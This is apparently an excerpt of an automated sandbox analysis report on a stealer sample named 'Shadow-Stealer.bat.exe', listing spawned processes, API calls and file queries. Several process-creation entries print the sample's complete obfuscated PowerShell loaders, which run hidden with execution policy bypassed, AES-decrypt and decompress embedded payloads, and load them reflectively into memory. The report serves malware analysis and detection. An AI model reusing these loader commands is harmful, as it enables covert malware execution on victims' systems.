$kxipu=[system.reflection.assembly]::load([byte[]]$lwtxx); $oppdg=$kxipu.entrypoint; $oppdg.invoke($null, $kawoq);}$xcaug1 = new-object system.security.cryptography.aesmanaged;$xcaug1.mode = [system.security.cryptography.ciphermode]::cbc;$xcaug1.padding = [system.security.cryptography.paddingmode]::pkcs7;$xcaug1.key = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('tm3zfpdkmzynpmflqy1uvewzay6dhwgl3hpqgmb2tk0=');$xcaug1.iv = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('zumramter/3la6uhcth1gg==');$qsfqp = $xcaug1.('rotpyrcedetaerc'[-1..-15] -join '')();$umirz = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('2twxifmv1jwyz0b8bphefa==');$umirz = $qsfqp.('kcolblanifmrofsnart'[-1..-19] -join '')($umirz, 0, $umirz.length);$umirz = [system.text.encoding]::('8ftu'[-1..-4] -join '').('gnirtsteg'[-1..-9] -join '')($umirz);$pyyqa = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('p05ztwckumfos2q8ryos+fixy2dyphhbyygl6z+cec8=');$pyyqa = $qsfqp.('kcolblanifmrofsnart'[-1..-19] -join '')($pyyqa, 0, $pyyqa.length);$pyyqa = [system.text.encoding]::('8ftu'[-1..-4] -join '').('gnirtsteg'[-1..-9] -join '')($pyyqa);$roofg = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('sy8hcjtfka/mf4hph+go6g==');$roofg = $qsfqp.('kcolblanifmrofsnart'[-1..-19] -join '')($roofg, 0, $roofg.length);$roofg = [system.text.encoding]::('8ftu'[-1..-4] -join '').('gnirtsteg'[-1..-9] -join '')($roofg);$tgmgc = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('buxxfqry1rop0b/roy4prlv7xh6eywkql6uot7vtjfzgnba4dmwvrz0rekh6tsw5e4dar7n8ykyorgfhmfzdschzoelrp0gmf7penq75exbqf+3j4n1ljy1xzypyejfwvjgbjvqe3cpowhnqattyty/6ujgytqqhsjigqqdcvjycexpvlg1ktaidhwbcleghzlplvk+ntj2pyl6wysfa3i8rptdz3r9ivjabt8a6toqzrs2q9nm/2k1/irfutdkvpptyy9cd0jq4mto7gdnvluac8kjm0rawso8rwa3zkjnybbv03aq6fif9zugda03cb0yo24aife5afn+zogdlktwrsyyivpjarzdcbblxkhprynayhbm2a5pmzva2gac2+o8odd180z07f5zl3mywto8Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\$sxr-powershell.exe "c:\windows\$sxr-powershell.exe" -nologo -noprofile -noninteractive -windowstyle hidden -executionpolicy bypass -command [system.diagnostics.process]::getprocessbyid(6400).waitforexit();[system.threading.thread]::sleep(5000); function vohzf($lwtxx){ $xcaug=[system.security.cryptography.aes]::create(); $xcaug.mode=[system.security.cryptography.ciphermode]::cbc; $xcaug.padding=[system.security.cryptography.paddingmode]::pkcs7; $xcaug.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('tm3zfpdkmzynpmflqy1uvewzay6dhwgl3hpqgmb2tk0='); $xcaug.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('zumramter/3la6uhcth1gg=='); $ctnvz=$xcaug.('rotpyrcedetaerc'[-1..-15] -join '')(); $omfgf=$ctnvz.('kcolblanifmrofsnart'[-1..-19] -join '')($lwtxx, 0, $lwtxx.length); $ctnvz.dispose(); $xcaug.dispose(); $omfgf;}function nnkof($lwtxx){ $abmbt=new-object system.io.memorystream(,$lwtxx); $fswzf=new-object system.io.memorystream; $zwqus=new-object system.io.compression.gzipstream($abmbt, [io.compression.compressionmode]::decompress); $zwqus.copyto($fswzf); $zwqus.dispose(); $abmbt.dispose(); $fswzf.dispose(); $fswzf.toarray();}function vzvjz($lwtxx,$kawoq){ $kxipu=[system.reflection.assembly]::load([byte[]]$lwtxx); $oppdg=$kxipu.entrypoint; $oppdg.invoke($null, $kawoq);}$xcaug1 = new-object system.security.cryptography.aesmanaged;$xcaug1.mode = [system.security.cryptography.ciphermode]::cbc;$xcaug1.padding = [system.security.cryptography.paddingmode]::pkcs7;$xcaug1.key = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('tm3zfpdkmzynpmflqy1uvewzay6dhwgl3hpqgmb2tk0=');$xcaug1.iv = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('zumramter/3la6uhcth1gg==');$qsfqp = $xcaug1.('rotpyrcedetaerc'[-1..-15] -join '')();$umirz = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('2twxifmv1jwyz0b8bphefa==');$umirz = $qsfqp.('kcolblanifmrofsnart'[-1..-19] -join '')($umirz, 0, $umirz.length);$umirz = [system.text.encoding]::('8ftu'[-1..-4] -join '').('gnirtsteg'[-1..-9] -join '')($umirz);$pyyqa = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('p05ztwckumfos2q8ryos+fixy2dyphhbyygl6z+cec8=');$pyyqa = $qsfqp.('kcolblanifmrofsnart'[-1..-19] -join '')($pyyqa, 0, $pyyqa.length);$pyyqa = [system.text.encoding]::('8ftu'[-1..-4] -join '').('gnirtsteg'[-1..-9] -join '')($pyyqa);$roofg = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('sy8hcjtfka/mf4hph+go6g==');$roofg = $qsfqp.('kcolblanifmrofsnart'[-1..-19] -join '')($roofg, 0, $roofg.length);$roofg = [system.text.encoding]::('8ftu'[-1..-4] -join '').('gnirtsteg'[-1..-9] -join '')($roofg);$tgmgc = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('buxxfqry1rop0b/roy4prlv7xh6eywkql6uot7vtjfzgnba4dmwvrz0rekh6tsw5e4dar7n8ykyorgfhmfzdschzoelrp0gmf7penq75exbqf+3j4n1ljy1xzypyejfwvjgbjvqe3cpowhnqattyty/6ujgytqqhsjigqqdcvjycexpvlg1ktaidhwbcleghzlplvk+ntj2pyl6wysfa3i8rptdz3r9ivjabt8a6toqzrs2q9nm/2k1/irfutdkvpptyy9cd0jq4mto7gdnvluac8kjm0rawso8rwa3zkjnybJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\Shadow-Stealer.bat.exe "Shadow-Stealer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function pXqKy($AMMuC){ $QAuMi=[System.Security.Cryptography.Aes]::Create(); $QAuMi.Mode=[System.Security.Cryptography.CipherMode]::CBC; $QAuMi.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $QAuMi.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('loy14lThS3SgWk7zmlM+U1LaSbD9l9+GRTu5mLzp2mM='); $QAuMi.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lS2YpgJeBrTrEw/fJyL2OQ=='); $LSyot=$QAuMi.CreateDecryptor(); $return_var=$LSyot.TransformFinalBlock($AMMuC, 0, $AMMuC.Length); $LSyot.Dispose(); $QAuMi.Dispose(); $return_var;}function YaPup($AMMuC){ $BpqPy=New-Object System.IO.MemoryStream(,$AMMuC); $MUxyL=New-Object System.IO.MemoryStream; $QRzEr=New-Object System.IO.Compression.GZipStream($BpqPy, [IO.Compression.CompressionMode]::Decompress); $QRzEr.CopyTo($MUxyL); $QRzEr.Dispose(); $BpqPy.Dispose(); $MUxyL.Dispose(); $MUxyL.ToArray();}function dAvUr($AMMuC,$oAPri){ $TIrdu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$AMMuC); $cmozY=$TIrdu.EntryPoint; $cmozY.Invoke($null, $oAPri);}$agzCo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\Desktop\Shadow-Stealer.bat').Split([Environment]::NewLine);foreach ($xWgWP in $agzCo) { if ($xWgWP.StartsWith('SEROXEN')) { $gZeLJ=$xWgWP.Substring(7); break; }}$paQQY=[string[]]$gZeLJ.Split('\');$ahdVx=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[0])));$qbiwj=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[1])));dAvUr $qbiwj (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));dAvUr $ahdVx (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));Jump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{2ca74e05-00fd-4f33-afb0-1baa728859ba}Jump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{a795ed5e-f9f8-4b9c-9e39-bf732c676d16}Jump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{3885b722-1a15-44b5-b09d-ff91e5413f87}Jump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{99a849d9-b898-48bd-a9ae-8d2739f763c9}Jump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess created: C:\Windows\$sxr-cmd.exe "C:\Windows\$sxr-cmd.exe" /c %$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%Jump to behavior
            Source: C:\Windows\$sxr-cmd.exeProcess created: C:\Windows\$sxr-powershell.exe C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{8c0db931-f9fd-42d4-a5c0-43590a2016f6}Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{c14234ed-73ac-4d78-a200-79518435a2b0}Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\$sxr-powershell.exe "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6400).WaitForExit();[System.Threading.Thread]::Sleep(5000); function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{cbe0811f-76a5-44cc-bdc5-f8341ab968a9}Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{e8c47de4-1fa8-45ae-ba48-1e652857c9f1}Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{38d5fde3-99ae-4373-8c2f-8b4f5f08f7f3}Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{92e841ec-e3f1-4b8b-895f-b885255cbce1}Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{25768c7a-7ac5-4718-a464-d7bd931650f7}Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{2e416721-4f03-488b-85bf-d48d4305e55d}Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{6cf183fd-4345-4e83-86c3-b67edbc5a93f}Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{b21552e6-10c0-4b77-8348-e34fa993b74e}Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{408c66d6-6f69-434f-838a-86e87b4371ae}Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{205dcea9-d057-463c-a3cf-998f0b1939dc}Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{a65f9779-a778-403b-96e3-bdb0de023251}Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_00401BC6 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,23_2_00401BC6
            Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_00401BC6 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,23_2_00401BC6
            Source: winlogon.exe, 00000016.00000000.2484058011.000002D016A60000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000016.00000002.3372155611.000002D016A60000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000001A.00000000.2490600186.000001D154AB1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
            Source: dwm.exe, 0000001A.00000002.3406365855.000001D159439000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 0000001A.00000000.2498836739.000001D159439000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: winlogon.exe, 00000016.00000000.2484058011.000002D016A60000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000016.00000002.3372155611.000002D016A60000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000001A.00000000.2490600186.000001D154AB1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: winlogon.exe, 00000016.00000000.2484058011.000002D016A60000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000016.00000002.3372155611.000002D016A60000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000001A.00000000.2490600186.000001D154AB1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: winlogon.exe, 00000016.00000000.2484058011.000002D016A60000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000016.00000002.3372155611.000002D016A60000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000001A.00000000.2490600186.000001D154AB1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\$sxr-cmd.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,13_2_00007FF7137F51EC
            Source: C:\Windows\$sxr-cmd.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,13_2_00007FF7137E6EE4
            Source: C:\Windows\$sxr-cmd.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,13_2_00007FF7137F3140
            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\$sxr-cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\$sxr-powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\$sxr-powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\$sxr-powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\$sxr-powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\$sxr-powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\$sxr-powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\$sxr-powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\$sxr-powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\$sxr-powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformationJump to behavior
            Source: C:\Windows\$sxr-powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Windows\$sxr-powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
            Source: C:\Windows\$sxr-powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\$sxr-powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
